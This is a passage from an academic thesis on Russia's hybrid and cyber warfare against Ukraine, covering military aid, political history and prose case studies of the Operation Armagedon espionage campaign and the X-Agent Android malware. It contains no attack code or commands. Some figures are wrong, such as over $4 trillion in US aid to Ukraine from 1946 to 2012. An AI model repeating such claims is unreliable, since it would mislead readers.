2017 ($3B CAD or $2.3B USD).98 While these numbers are not specific to the cybersecurity industrial complex, they show the growth that Ukrainian military infrastructure underwent following the aggression in eastern Ukraine. Further, Ukraine receives large amounts of funding to supplement the cost of heightening or instituting cybersecurity programs and strengthening training for cybersecurity professionals. Western states such as the United States and Canada, as well as international organizations like the EU and NATO are involved in supporting Ukraine and supplying technical expertise or easing the burden of monetary costs of new technologies.
The United States supports Ukraine financially to supplement the shortage of military training, equipment and expertise. Between 1946 and 2012 the total foreign assistance of the
United States to Ukraine totaled over $4 Trillion USD. The majority of the funding was for economic assistance, not military assistance, with only $910.9 Million USD over the 66 years, an average of $13.8 Million USD a year, going to total military assistance, which includes threat reduction, drug interdiction and counter-drug assistance military financing, education and training, peacekeeping and other assistance.99 In 2013, at the start of the Maidan Revolution, military assistance for the year totaled $41.3M USD with a heavy focus, $32.8M USD, 79.4 percent of all spending, on Cooperative Threat Reduction.100 In 2014, and the start of the War in Donbas, military funding to Ukraine again increased, with the United States spending $57.3M USD, the largest proportion of that being for Cooperative Threat Reduction, $49.2M USD, or 85.86 percent of all military spending.101 In 2015, the United States began to take a different approach by
98 Rudomsky, “Как изменились Вооруженные силы Украины за 25 лет?” 2016. 99 USAID, U.S. Overseas Loans and Grants: Obligations and Loan Authorizations, July 1 1945- September 30 2016. Washington DC: GPO, 2016. 178 100 USAID, U.S. Overseas Loans and Grants, 178. 101 Ibid. 50
allocating Ukraine $76.8M USD in military funding with only $27.7M USD, 36 percent of the total military assistance, going towards Cooperative Threat Reduction. In 2015 there was a pivot to providing assistance in the category of Foreign Military Financing, often used for equipment and other military strengthening purchases, as $47.0M USD or 61.2 percent of all military assistance to Ukraine.102 In FY2016 the DoD announced a new security assistance program, the
Ukraine Security Assistance Initiative, which aimed to “provide defensive equipment and training” to the Ukrainian Military.103 In 2016, the military assistance provided to Ukraine from the United
States jumped to $311.4M USD, with no money allocated to Cooperative Threat Reduction.
Instead, FY2016 saw $80.3M USD allocated to Foreign Military Funding, a substantial increase from $6.6M and $6.1M USD in 2014 and 2015, respectively.104 The “other military assistance” category received the bulk of the funding, $228.2M USD, 73.28 percent of the FY2016 total, raised from zero in both 2014 and 2015.105
Military Assistance to Ukraine is not only coming from the United States as Ukraine receives funds from the majority of Western states, including Canada. Since 2014 Canada has provided assistance totaling over $700M CAD, over $525.3M USD, in “financial development, humanitarian and non-lethal military assistance, including military equipment.”106 Similar to the
United States, Canada assists in training, especially police and civilian interaction training, and other programs aimed at strengthening civilian trust in the Ukrainian government and political system.107 The majority of Canadian assistance to Ukraine has been for International Security and
102 USAID, U.S. Overseas Loans and Grants, 178. 103 Ibid. 1. AND Ukraine Security Assistance Initiative, Security Assistance Monitor at the Center for International Policy, last modified April 29, 2019. securityassistance.org/content/Ukraine%20security%20assistance%20initiative 104 USAID, U.S. Overseas Loans and Grants, 178 105 Ibid. 106 House of Commons, “Canada’s Support to Ukraine In Crisis and Armed Conflict: Report of the Standing Committee on National Defence,” Standing Committee on National Defence, 42nd Parliament, 1st Session. December 2017. 1-2. 107 Ibid. 51
Crisis Response and Country and Regional Programs, which totals $66.93M CAD, 85.7 percent of all assistance to Ukraine.108
While these assistance numbers may appear to be large amounts of money to aid Ukraine, military endeavors are expensive, and Ukraine is in a state of war on its own soil, which raises cost and need. Since Ukraine lost the majority of its Air Force and military equipment when Russia annexed
Crimea, there is a great need to restock and resupply the military. From 2014 to 2017 Ukrainian military assets have declined in all areas. The military has lost 488 battle tanks, 716+ armored vehicles, all submarines, 96 fixed wing combat aircraft and 170 helicopters.109 While these numbers may not seem drastic, the lost assets is nearly half of all equipment. Costs to replace equipment is high, and the Ukrainian military is working to phase out old Soviet equipment and replace it with western produced military equipment. Even so, a Soviet made MiG-29, which is currently flown by the Ukrainian Airforce, costs $22M USD per unit. An hour of flight time is estimated to cost $24,000 USD. Newer developed planes and U.S. manufactured military equipment is even more expensive to acquire, maintain and operate. A F-35A fighter jet costs
$89.2M USD each while a newer generation F-35B costs $115.5M USD.110 The funding Ukraine receives from the United States raises the total spending Ukraine has for advancing infrastructure, but it still does not place Ukraine on the same level as Russian military spending, especially when it comes to infrastructure for cyber capabilities, as the majority of government assistance focuses on weapons and social programs.
108 Statistical Report on International Assistance 2015-2016, Global Affairs Canada, last modified April 28, 2017 http://www.international.gc.ca/gac-amc/publications/odaaa-lrmado/sria-rsai-2015-16-d2.aspx?lang=eng 109 House of Commons, “Canada’s Support to Ukraine In Crisis and Armed Conflict,” 61 110 Producing, Operating and supporting a 5th Generation Fighter, Lockheed Martin, last modified 2019. https://www.f35.com/about/cost 52
4 UKRAINIAN CRISIS
Chapter 3 clearly demonstrates that large states with ample funding and a large knowledge base have a substantial power imbalance with small states that lack funding for modern technologies as well as a lower population of skilled workers. As cyber is still a relatively new aspect in warfare it has become a major focus of states across the globe that can fund new innovations in this sphere with the goal of outpacing opponents. However, the imbalance between states that have strong technological capabilities and the states that cannot afford to fund new cyber warfare technologies are vast. Disadvantaged states have little defensive structures, leave equipment in vulnerable areas that can be vulnerable to tampering, or have too much technology for each expert in the state to properly defend all systems. Conversely, large states can continue to fund innovation and defensive programs at a rate which ensures their technology will be superior to the rest of the world.
To some extent large powers such as the United States can control the public perception of the threat of cyberattacks by heavily investing in protection efforts and other public services aimed at combating or assisting victims of cyberattacks. Larger states economic ability to fund programs and technology protect them from receiving the most crippling cyberattacks or to mitigate their effects more effectively. However, a smaller state, embroiled in a geographical dispute or political discourse with a larger state is more likely to be the victim of a detrimental cyberattack.111 Small states are unable to defend themselves to the same extent a large state would in a similar situation, making the most prevalent cyber defense system, active defense, an impossibility both technically and monetarily.
111 Valerino and Maness, "The Dynamics of Cyber Conflict between Rival Antagonists. 53
Recall that the primary focus of this thesis is on the interactions between cyber and conventional warfare in the Ukrainian Crisis as it is the first conflict of its kind and is important to understand due to the potential implications of this type of warfare in the long term. Hybrid warfare in Ukraine has been ongoing with the Russian government’s goal to harm the society and to compromise the Ukrainian government’s oversight. By using hybrid warfare, the Kremlin is able to disrupt the flow of Ukrainian government operations, day to day activities of citizens, and sow frustration against the ineffectual response of the Ukrainian government. By exploiting preexisting vulnerabilities within Ukrainian infrastructure and society, the Kremlin’s hybrid war is aimed, not only at destroying the hold of the government, but also destroying the very fabric of Ukrainian society from inside its borders.
This chapter begins with a historical overview of Russia-Ukrainian relations since
Ukrainian independence, following this, the chapter then discusses the five cyberattacks used in this thesis. For each cyberattack, an in depth look into the attack is completed to better understand the attacks Ukraine is faced with and then each attack is categorized based on the definitions of cyberattacks provided in Chapter 2.
Employing hybrid warfare not only uses “critical vulnerabilities in hardware such as communications, infrastructure or transport” but also “takes advantage of social discontent or perceptions of corruption to level the playing field.”112 Ukraine, which has a history of corruption,
Russian interference, public disapproval of state power, and a strenuous divide between the ethnic
Russian and ethnic Ukrainian populations, was positioned with easily exploitable social structures, already marred by shortcomings. By exploiting these aspects of cultural instability, Russia has historically been able to exert a disproportionate amount of control over the Ukrainian population
112 Danyk, Maliarchuk and Briggs, “Hybrid War,” 7. 54
through targeted information warfare. However, as technology advances and the Ukrainian Crisis continues, the cyberattacks against Ukraine have turned from information dissemination to targeted attacks on critical infrastructure and other technologically reliant entities of the state that have led to immediate real world, long-lasting, implications.
From the start of Russia’s involvement in Ukraine during the February 2014 annexation of
Crimea, cyber has played a large roll in Russia’s movements. Cyberattacks were able to take down communications between Crimea and mainland Ukraine prior to the little green men moving on to the peninsula. A large number of information warfare tactics were used to disenchant the people living on the peninsula from the remainder of Ukraine.
The Ukrainian Crisis has been the culmination of a multitude of deep seeded problems with
Ukrainian society and the former Soviet influence within the state. Ukraine, since independence in 1991, has struggled with government corruption, Russian influence in the state, and joining the
European Union. Beginning with the fall of the Soviet Union, corrupt politicians took positions in the Ukrainian government, a leftover structure from Soviet times strongly influenced by the corrupt nature of the Soviet system. In the 1990 Ukrainian Declaration of Sovereignty, Ukraine declared itself a neutral power stating: “the Ukrainian SSR solemnly declares its intention of becoming a permanently neutral state that does not participate in military blocs and adheres to three nuclear free principles: to accept, to produce and to purchase no nuclear weapons”.113 While remaining a neutral power, the independent Ukrainian government aimed to secure alliance with both the European Union and NATO, focusing on trade rather than advancement in the military.
113 Verkhovna Rada of the Ukrainian SSR, Deceleration of State Sovereignty of Ukraine (Kyiv, Ukraine, 16 July 1990). 55
Ukrainian integration with the West began with a 1992 Ukrainian government trade agreement on steel products with the European Coal and Steel Community.114 Shortly after, in
1994, Ukraine signed a partnership with NATO, becoming a member of the Partnership for Peace
(PfP). In 1998, Ukraine officials first publicly declared the intention to become a member of the
European Union.115 In conjunction with the EU since the early 2000s, Ukraine has been given an action plan to complete if they are to become a full member state of the EU. Communication between the two powers is open concerning the shortcomings of the government, its enforcement of policies to combat corruption, and other political barriers barring entrance into the European
Union.116 In 2004 the EU expanded and accepted the Baltic States, thereby successfully integrating former Soviet States. Following this, Ukraine again advocated for membership in the EU. Again, the European Union rebuffed the proposal, citing numerous violations of its core principles. The continued corruption, a Soviet by-product, hindered the total advancement of the country.
4.1 Historical Tensions
Historically, Russia and Ukraine have been similar culturally, socially and linguistically, leading the stronger state, Russia, to assume a continued partnership based on past alliances and interactions. Historic and linguistic ties have allowed Russia to view Ukraine as a beneficiary of
Russian power, tying them closer to Russia than most of the other states once under the Russian sphere of influence. Approximately 17.3% of Ukrainian citizens are of Russian ethnicity and
77.8% of citizens are of Ukrainian ethnicity, although close to 50% of all citizens speak Russian as their first language and claim some Russian heritage, with a much denser population in the
114 "EU-Ukraine Summits: 16 Years of Wheel-Spinning," The Ukrainian Week, March 15, 2018. http://ukrainianweek.com/Politics/73494. 115 Ibid. 116 Ibid. 56
regions of Crimea, Luhansk and Donetsk.117,118 Russian influence over the Russian speaking minority in Ukraine stems from a long battle with Russia trying to exert its sphere of influence over its former territory. Russia officially ignored Kyiv’s pro-Western foreign policy and used ties between language and culture to pressure certain ideological groups within Ukraine.119 This divide is embedded in the media, which shapes different ethnicity’s viewpoints of the West and of Russia.
Even during Ukraine’s formative years, the state engaged in information warfare to protect citizens from the strengthening Russian hold over the ethnolinguistic Russian population in Ukraine.120
This often led Russian-speaking Ukrainians to believe the opposite of what Ukrainian-speaking
Ukrainians believe. Russian speakers tend to be exposed to Russian rhetoric and ideas while the majority of Ukrainian speakers are exposed to Western ideas. This divide of influence on the population leaves a deeper divide in Ukraine than a simple disagreement over language.
Orange Revolution
The continued push and pull of Western and Russian ideas and the divide between Russian and
Ukrainian speakers bubbled to the surface prior to the Maidan Revolution. While the 2004 Orange
Revolution was not as bloody or long-lasting, nor could it be considered hybrid warfare, it is important to understand the historical significance of social unrest within Ukraine and how hybrid warfare can exploit vulnerabilities already prevalent within a society. The Orange Revolution began in protest against the fraudulent voting system in the 2004 Ukrainian presidential election.
117 State Statistics Service of Ukraine. Number and Composition Population of Ukraine by data All-Ukrainian Census 2001, (Kyiv, Ukraine, 2001) http://2001.ukrcensus.gov.ua/eng/results/general/nationality/ (accessed Nov. 28, 2016). 118 Tor Bukkvoll, Ukraine and European Security (London: A&C Black, 1997) 38-39. 119 John Kriendler, “Ukrainian Membership in NATO: Benefits, Costs and Challenges,” Defence Academy of the United Kingdom: European Center for Security Studies Occasional Paper Series, no. 12 (July 2007): 11. 120 In accordance with the rules of non-engagement, yet support for the Ukrainian government, the approach of information war is undertaken by many different organizations and embassies to combat the false information presented by Russian media. 57
In the election the EU publicly supported Yushchenko for president.121 Russian media and Kremlin backed directors helped Yanukovych’s campaign through advising, directing and promoting his campaign.122 The Ukrainian media was controlled by the corrupt Ukrainian government, which supported Yanukovych as the next president. They attacked Yushchenko for the length of the campaign and did not allow him any news airtime. Yushchenko was bared by air traffic controllers, road blocks, a truck trying to run his car off the road and was subjected to being followed by state security operatives.123 Yushchenko was poisoned with dioxin in September 2004. Supporters of
Yushchenko blamed Yanukovych and the corrupt government backing him, but the media listed
“eating contaminated sushi, getting herpes, and undergoing Botox treatment to preserve his 50- year-old good looks” as the only plausible ways he could have contracted the disease.124
Following the announcement of a Yanukovych victory, protesters staged non-violent protests against him because the exit polls and the official votes were off by over four percent.125
Election monitors at multiple polling stations recounted how voters were moving around polling stations with multiple absentee ballots, casting votes for Yanukovych.126 Yanukovych was ousted from his presidential position and Yushchenko was declared the winner. The Orange Revolution was a blow to Russia and to Putin after advocating for Yanukovych as the next president of
Ukraine. However, Yushchenko was fearful following the violent campaign and Orange
Revolution, his health was weak as was his will to be a powerful leader. As the president he was not an effective politician and, instead, worked to consolidate his power, fearful of retribution.127
121 "EU-Ukraine Summits," The Ukrainian Week. 122 Adrian Karatnycky, “Ukraine’s Orange Revolution,” Foreign Affairs 84, no. 2 (2005): 49. 123 Ibid. 124 Ibid. 125 Ibid. 36. 126 Ibid. 127 Adrian Karatnycky and Alexander J. Motyl, "The Key to Kiev: Ukraine’s Security Means Europe’s Stability,” Foreign Affairs 88, no. 3 (2009): 107-108. 58
Under Yushchenko the government was split, his former partners turned against his weak style of governance and the economy took a downturn, leading to further fracturing in the already unstable political arena.128 The Russian relationship with Ukraine was still a top priority during
Yushchenko’s presidency, and there was a desire to improve the relationship but the end goal remained the “consolidation of Ukraine’s democracy and market economy through integration with the EU.”129 Under Yushchenko, the Ministry of European Integration worked to accelerate the partnership of Ukraine with the EU through the heightening of standards and other reforms needed to secure a membership invitation.130
Yushchenko did not succeed in his post, sowing anger among both those who had supported him and those who had supported Yanukovych. Each side had their own qualms with the Yushchenko presidency. Those who had supported his presidential bid were frustrated with his cordial treatment of Russia and his willingness to embrace the Russian involvement and influence in infrastructure, society and political dealings. Those who had supported Yanukovych for president were angry at the ineffectiveness of Yushchenko and saw his presidential term as an illegitimate power grab. Yushchenko, whose campaign platform had strongly advocated for integration into the EU as a means to a more stable and economically robust state, had failed to deliver on his promises. Yanukovych supporters blamed the strong Westward focus of the government for the ineffectual changes within the Ukrainian state and the hardships they continued to endure.
128 Karatnycky and Motyl, "The Key to Kiev,” 108. 129 Ibid. 130 Adrian Karatnycky, “Ukraine’s Orange Revolution,” 50-51. 59
Yanukovych Wins
The following presidential elections, held after a divisive end to, but full term of, Yushchenko’s reign, pitted Yanukovych against a former ally, turned critic, of Yushchenko, Yuliya Tymoshenko.
In February 2010 Victor Yanukovych beat Tymoshenko in a run-off vote with 48.95% of the vote, largely consolidated in the eastern regions of Luhansk and Donetsk and on the Crimean Peninsula.
The ethnically Russian areas supported Yanukovych, much as they had in the 2004 election.
Immediately after he was elected president, Viktor Yanukovych signed Ukraine’s non-bloc status into law, making Ukraine militarily neutral, halting any rumored NATO integration.131 While there were remnants of pro-EU deals still in the works in the Ukrainian government, Yanukovych began to quietly dismantle the relationship with the West and build stronger ties with Russia.
4.2 Maidan Revolution
In 2013, Viktor Yanukovych rejected an EU deal which would have brought Ukraine closer to the EU in trade and finance. EU integration, which had long been in the state plans of previous governments was brought to an abrupt halt. Since Ukraine had been in open agreement with the
European Union about its intentions to become a member state since the early 2000s and had agreed in 2008 to work collectively towards that goal, the pivot from EU integration towards a closer partnership with Russia was an unwelcome change for many.132 The Yevromaidan
Revolution (eng: European Square Revolution, hereafter referred to as Maidan Revolution,
Revolution, or Maidan) began on 21 November, 2013 on Madian Nezhelenosti (eng: Independence
Square) in response. The first rallies of the Maidan Revolution began in Kyiv, led by opposition
131 Adrian Karatnycky, “Ukraine’s Orange Revolution,” 50-51. 132 "EU-Ukraine Summits: 16 Years of Wheel-Spinning," The Ukrainian Week. 60
leader Arseniy Yatsenyuk who promoted peaceful protests through public Facebook events.133
Quickly, protests spread to Lviv, Luhansk, Donetsk, Kharkiv and other metropolitan cities throughout Ukraine.134 After several months the street protests turned violent, leading to the deaths of over one hundred citizens. Unsure of which side instigated the violence, protesters blamed the government for firing against unarmed, peaceful protesters, and the government released statements condemning the violent actions of organized street gangs as the start of violence. It was during early 2014 when the violence escalated from peaceful activity to full violence between factions of street gangs, organized paramilitaries, and government operatives. The most violent protests on Hrushevskoho street had been ongoing for several days before the first three people were shot to death by snipers.135,136
On 22 January 2014 the first direct death on Independence Square was recorded as clashes on Hrushevskoho Street intensified between Ukrainian Special Forces (Berkut) and protesters. The deadliest day was 20 February, when over 50 protesters, largely unarmed, were shot by snipers firing from atop the Hotel Ukraine.137 Both sides – those in support of the government and those in opposition to Yanukovych – took up arms and came into direct conflict with one another; most of the time they did not know who was doing the shooting, who shot first or from what position they were under fire.138 The leaders of the opposition political movement, who had begun the peaceful protests in 2013 against the pivot from EU integration, strongly advocated against
133 "Народне віче за європейську Україну,” Facebook, accessed March 20, 2017. 134 "EuroMaidan rallies in Ukraine - Nov. 21-23 coverage," KyivPost, November 25, 2013, accessed March 17, 2017. 135”Автомайдан. Хто ми?" Автомайдан, accessed March 24, 2017. 135 "Raw video footage of Ukraine EuroMaidan protesters gunned down in Kiev by snipers," YouTube, February 22, 2014, accessed March 19, 2017. https://www.youtube.com/watch?v=gsRPEXxI2dk. 136 "Ukraine Maidan deaths: Who fired shots?" BBC News, accessed March 20, 2017. http://www.bbc.com/news/world-europe- 31435719. 137 "Ukraine Maidan deaths: Who fired shots?" BBC News. 138 “Що таке "Правий сектор"?" ПРАВИЙ СЕКТОР. 61
violence in any form, calling on the people to “conduct massive protest actions in all of Ukraine.
They must witness our strength.”139
Kidnappings and beatings of prominent opposition leaders was a further concern of those protesting against Yanukovych’s government. Dmytro Pylypets, an organizer for the protests in
Kharkiv, was beaten, stabbed and left to die in the harsh Ukrainian winter.140 In late December
Tetyana Chornovol, an activist/journalist turned protest leader who had documented
Yanukovych’s lavish lifestyle, was purposely run off the road by a utility jeep, and subsequently beaten by an unknown number of men. When she ran, they forcibly detained her and beat her in the street.141 A picture of her bloodied and bruised face was used on anti-government materials distributed by the opposition. Dmytro Bulatov, the leader of a protest group, was kidnapped in late
January, reappearing a week later having been visibly tortured and beaten.142 The opposition leader had part of his ear cut off, claimed to have been crucified, and had cuts all over his body which he said were “done by men with Russian accents”.143 His kidnapping came one day after the kidnapping of another prominent leader, Igor Lutsenko, and protester Yuri Verbitsky.144 Lutsenko gave accounts of similar beatings and Verbitsky was found dead in the Boryspil region, the same region where Bulatov reappeared.145 These attacks spurred the idea that there were “death squads” deployed either by Russia or by Yanukovych’s government aimed at intimidating and killing the
139 "Ukraine protests after Yanukovych EU deal rejection," BBC News, November 30, 2013, Accessed March 17, 2017. http://www.bbc.com/news/world-europe-25162563. 140 "Ukraine activist Chornovol's beating causes outrage," BBC News, December 25, 2013, Accessed March 22, 2017. http://www.bbc.com/news/world-europe-25515838. 141 David Herszenhorn, "Journalist Is Beaten in Latest Attack on Ukrainian Opposition," The New York Times. December 25, 2013, Accessed March 20, 2017. http://www.nytimes.com/2013/12/26/world/europe/ukraine.html. 142 "Ukraine opposition activist Dmytro Bulatov says kidnappers "crucified" him, cut up ears and face," CBS News, January 31, 2014, Accessed March 21, 2017. http://www.cbsnews.com/news/ukraine-opposition-activist-dmytro-bulatov-says-kidnappers- crucified-him/. 143 "Stand-off over 'tortured' Ukrainian activist Dmytro Bulatov," BBC News, January 31, 2014, Accessed March 18, 2017. http://www.bbc.com/news/world-europe-25988661 144 Ibid. 145 "Stand-off over 'tortured' Ukrainian activist Dmytro Bulatov," BBC News. 62
leaders of the opposition.146 This led to an escalation of violence from the initially peaceful protestors as well as the emergence of a more forceful and outward approach from the Ukrainian government and pro-Russian supporters.
Due to the surmounting pressure from the people and the international community, coupled with the success of the protestors, Yanukovych announced early presidential elections and extended a peace agreement to the opposition’s main leadership on 21 January 2014.147 The deal
Yanukovych offered was rejected by all the organizations who received offers.148 With no options left except for impeachment, Viktor Yanukovych fled Ukraine to Russia on February 22, 2014, with the help of Vladimir Putin.
4.3 Annexation of Crimea
On 23 February, 2014, demonstrations supporting Russia cropped up in Sevastopol,
Crimea and by 27 February, unmarked and masked troops took over the parliament of Crimea and initiated a referendum on Crimean independence.149 The largest party in the government of Crimea
(80 out of 100 of the legislative seats) was “publicly committed to autonomy within Ukraine.”150
A week after the Parliament building was adorned with a Russian flag, the local leader, Aksyonov, declared Parliament was appealing to Putin, asking for the annexation of Crimea.151 The annexation was seen throughout much of the western world as an illegal push by Moscow to assert dominance over Crimea, which has a Russian majority population. Moscow continuously denied
146 See http://www.bbc.com/news/world-europe-25988661, http://www.nytimes.com/2013/12/26/world/europe/ukraine.html, https://www.kyivpost.com/article/content/ukraine- politics/journalist-and-protest-activist-chornovol-beaten-near-kyiv-334224.html, http://www.bbc.com/news/world-europe- 25515838, https://www.youtube.com/watch?v=yOOXFpK-HG4 and the full press conference with Bulatov in Vilnius, Feb 5, 2014, https://www.youtube.com/watch?v=4_qjhi9qep0 147 "EuroMaidan rallies in Ukraine (Feb. 19 live updates)," KyivPost, February 20, 2014, Accessed March 26, 2017. 148 Ibid. 149 "How the separatists delivered Crimea to Moscow." Reuters. 150 Ibid. 151 Ibid. 63
that there was any Russian involvement in the takeover of Parliament and maintained that the pro-
Russian separatists were acting of their own accord, not influenced or funded by the Kremlin. The pro-Russian propaganda which sprung up quickly in Crimea left no doubt to the funding and the power behind the quick, decisive and masterful takeover of Crimea. On March 1, the Russian
Duma approved Putin’s request to use force in Ukraine to protect Russian interests. On March 18,
Putin signed a bill to bring Crimea into the Russian Federation.152
4.4 War in Donbas
Shortly following this, Donbas, which includes the regions of Luhansk and Donetsk in eastern Ukraine, was thrown into turmoil as demonstrations across the region arose in the aftermath of the annexation of Crimea and the end of the Maidan Revolution. Both Donetsk and Luhansk declared themselves separate “People’s Republics” several months after the end of Maidan. These regions were claimed by armed pro-Russian separatists with the help of the Russian military, but the Kremlin denied all alleged involvement in Ukraine. Donetsk and Luhansk People’s Republics were declared by the new Ukrainian government as “terrorist organizations with a rigid hierarchy, financing channels and supply of weapons.”153 The fighting pits pro-Russian separatists (funded by the Kremlin) against the Ukrainian military and paramilitary groups, which disagree with the government’s approach to fighting the invasion.
The Ukrainian Crisis has been fought under a guise of falsehood, with the Russian government categorically denying both physical and cyber involvement in Ukraine. The Kremlin continuously denied involvement in eastern Ukraine and Crimea. Even after the internationally
152 "Ukraine crisis: Timeline," BBC News, November 13, 2014. 153 InterFax Ukraine, "Ukraine's prosecutor general classifies self-declared Donetsk and Luhansk republics as terrorist organizations," KyivPost, May 16, 2014. 64
covered downing of commercial flight MH-17 with a Russian Buk missile over the region of
Donetsk, Russia continued to deny involvement in the region. International pressure mounted but the Kremlin continued to deny involvement while showing public support for the pro-Russian separatists in eastern Ukraine. This denial of accountability has been a hallmark of the war in
Donbas and the Ukrainian Crisis as a whole. Coupled with the historically divided nature of
Ukraine, the differences in ethnolinguistic groups, historical Russian involvement in the society and the remnants of the Soviet system, the atmosphere was perfect to exploit physical and cyber vulnerabilities through modern hybrid warfare.
4.5 Cyberattacks against Ukraine
Since Ukrainian Independence after the fall of the Soviet Union, Russia has exerted a strong influence over Ukrainian territory, citizens and cyber infrastructure, including owning the main telecommunications providers in Ukraine. Before the Maidan Revolution there was “a fairly typical array of [cyber] incidents” in Ukraine, most of which were limited to Distributed Denial of
Service (DDoS) attacks.154 Commonly, attacks were mostly information warfare attacks, such as the 2014 election hacking which showed the presidential winner of the new Ukrainian government as the ultra-nationalist, right-wing candidate from the militarized political party, Right Sector.
Initially it is thought that the attacks at the beginning are the works of amateur hacktivist groups, not funded by the Russian government.155 While the election tampering was a cause of panic and confusion within both Ukraine and Russia, as Russian State TV broadcast the incorrect results, it did little in long lasting harm to government infrastructure. However, as the Maidan Revolution
154 Nikolay Koval, “Revolution Hacking,” in Cyber War in Perspective: Russian Aggression against Ukraine, ed. by Kenneth Geers. NATO CCDCDE Publications. (Tallinn: 2015): 55 155 Ibid. This is also corroborated by the attribution of the initial attacks, most of which have been taken credit for by CyberBekrut, a pro-Russian group operating out of eastern Ukraine. This group has no known funding ties with the Russian government, despite their support for the Russian government’s intentions in eastern Ukraine. 65
and the War in Donbas unfolded, cyberattacks also began to increase and transform from hacktivism to serious malware, such as Red October, MiniDuke and Net Traveler.156
The first large scale attack that caused significant damage to the Ukrainian state was during the annexation of the Crimean Peninsula. During the annexation, cyber tactics were employed to disrupt communication of Kyiv Rada members, cutting all communications between the Crimean
Peninsula and mainland Ukraine, thereby forcing the Crimean people to rely on the unmarked soldiers for everything from EMS services to receiving news.157 After Crimea was annexed, attacks continued, and the “relative sophistication of these attacks suggested that they were directed and controlled by a state or military entity, such as the GRU or FSB, rather than a co-opted hacker group.”158 When the War in Donbas began after the LPR and DPK declared independence, cyberattacks again rose in prevalence and persistence.
Cyberattacks against Ukraine have largely been attacks on critical infrastructure, institutions or a combination of both. Some of the attacks have specifically targeted the military or the government but as the Ukrainian Crisis continues, the attacks continue to grow in sophistication and detrimental effects on cyber networks. Spill over from a government or military target has occurred with the attacks devastating commercial entities and institutions outside of
Ukraine. The following five attacks are chosen because of their devastating nature as well as the prominent role they each play in gaining advantage over Ukraine militarily, socially and structurally. Each attack will be analyzed by its functionality and its components to determine which cyberattack category, as defined in Chapter 2 it should be included. The attributes and
156 Nikolay Koval, “Revolution Hacking,” 55. 157 Marie Baezner and Patrice Robin, “Hotspot Analysis: Cyber and Information Warfare in the Ukrainian Conflict,” Center for Security Studies (CSS) (Zurich, June 2017). 158 Connell and Vogler, “Russia’s Approach to Cyber Warfare,” 21. 66
definitions of the attack are important to understand when choosing what attacks to analyze with which tools.
Operation Armagedon.
Operation Armagedon159 was the name given to the Remote Access Tool (RAT) attack that targeted the Ukrainian government, law enforcement and military networks to gain “insight into near term Ukrainian intentions and plans” in the Ukrainian Crisis and subsequently the War in
Donbas.160 This attack can be traced back to malicious code time stamped, at the earliest, on June
26, 2013.161 It is around this time that the Ukrainian government initially decided to accept the
Ukraine-European Association Agreement that would have brought Ukraine closer to member- state status in the European Union. The first known use of the malicious code was between August
12 and September 16, 2013, leading to the 10th Annual Yalta Meeting: “Changing Ukraine in a
Changing World: Factors of Success.”162 Although both the implementation of the malicious software, and the initial use of Operation Armagedon began before the Maidan Revolution, the attack persisted until April 3, 2015, a total of 646 days.163
The attack was initialized through malicious attachments, known as phishing, sent to
Ukrainian targets. The malicious files were designated to appear as documents pertinent to the ongoing crisis in Donbas, such as “Total List of People detained and held in днр [DPR] from July
2014.scr” and others were copied from stolen official files.164 These malicious files were used as
159 I will be using the title of Operation Armagedon, rather than Operation Armageddon, due to the use of the improperly spelled version in the metadata of the attack. 160 Lookingglass Cyber Threat Intelligence Group. “Operation Armageddon: Cyber Espionage as a Strategic component of Russian Modern Warfare.” April 28, 2015. 161 Ibid. 4. 162 Ibid. 163 Ibid. 164 Ibid. 67
a dropper for Self-Extracting Archives (SFX) which then would, in turn, use the legitimate
“wget.exe” to install payloads from a remote Command and Control Server (C&C).165 The remote
C&C would then be used to download the RAT, which would be used to send information from the infected computer to the C&C as well as steal legitimate documents to use in later attacks.166
The Security Services of Ukraine (SBU) attributed the attack to the 16th and 18th Centers of the Russian FSB and Lookingglass Cyber Threat Analysis Group stated that they found no evidence to the contrary based on their evaluation.167 Based on the timeline of Operation
Armagedon, and the timeline of the Ukrainian Crisis, the events are correlated and the implementation of attacks against specific target groups changes as the physical nature of the conflict on the ground continues. The attacks timestamps correspond to working hours in Ukraine and the knowledge of Russian language, and lack of knowledge of English, make it a more plausible scenario that the attackers are native Russian speakers than either English or Ukrainian speakers. Thus, Lookingglass determined that the attackers are most likely operating out of eastern
Ukraine and are funded by the Russian government.168
This attack had both a national security and a political focus, and was perpetrated against a state so it falls within our definition of cyberattack. Operation Armagedon can safely be classified as Cyber Espionage because it is being carried out against a state (Ukraine) by another state or non-state, during an ongoing crisis or conflict and is specifically targeting information to gather and then use maliciously. Due to of the nature of the attack, which was aimed to gain information, rather than to destroy or wreck direct havoc on Ukrainian computer networks or infrastructure, this
165 Lookingglass, “Operation Armagedon,” 10. 166 Ibid. 8. 167 Ibid. 6. Citing from https://ssu.gov.ua/sbu/control/en/publish/article?art_id=138949&cat_id=35317 and https://ssu.gov.ua/sbu/control/en/publish/article?art_id=131264&cat_id=131098 168 Lookingglass, “Operation Armageddon.” 68
attack cannot be considered an act of cyber warfare. While military personnel may have died because of this attack, there is no direct correlation found so no deaths can be attributed to
Operation Armagedon. For the attack to be considered information warfare it must be carried out by another state. While the SBU is generally confident that the FSB is behind the attacks, it appears that the attackers, although most likely state funded, are not members of the state apparatus, and are operating remotely from eastern Ukraine.
X-Agent.
X-Agent itself is a relatively commonly used attack which utilizes backdoors for remote monitoring. While the X-Agent malware is not confined to this specific attack, this was the first time in which X-agent was used against the Android platform rather than the iOS platform. The malicious software was embedded on a version of the military application Попр-Д30.apk, which simplified the use of Ukrainian D-30 towed howitzer.169 This application was originally distributed without the X-Agent malware infection on a Ukrainian military forum vKontakte, the Russian equivalent to Facebook, by Yaroslav Sherstuk, to approximately 9,000 artillery personnel on the
Ukrainian eastern front.170 The corrupt application was distributed around this time, estimated to be approximately April 28, 2013, was then linked to the vKontakte forum, masquerading as the benign version. This malicious attack, which began before the Maidan revolution, persisted without knowledge until December 21, 2014.171 Even when the malicious application was discovered in late 2014, the malicious code could not be removed from Попр-Д30.apk and the application continued to run as the benign app should have but continued relaying information on
169 CrowdStrike Global Intelligence Team. “Use of FANCY BEAR Android Malware in Tracking of Ukrainian Field Artillery Units.” Published December 22, 2016. Updated March 23, 2017. 170 Ibid. 171 CrowdStrike, “Use of FANCY BEAR Android Malware.” 69
geolocation, movement, firing data, call logs, internet data, contacts and SMS services to the developer of the malicious application.172 This infected application would not have been able to provide all the data needed for a decisive attack against Ukrainian positions, which would otherwise have required additional reconnaissance for a physical attack.173
This was the first time X-Agent had been used on the Android platform, meaning that the attacking group had to change the code structure and therefore, must have been familiar with the iOS code and usability. The known hacker group FANCY BEAR (also known by the names
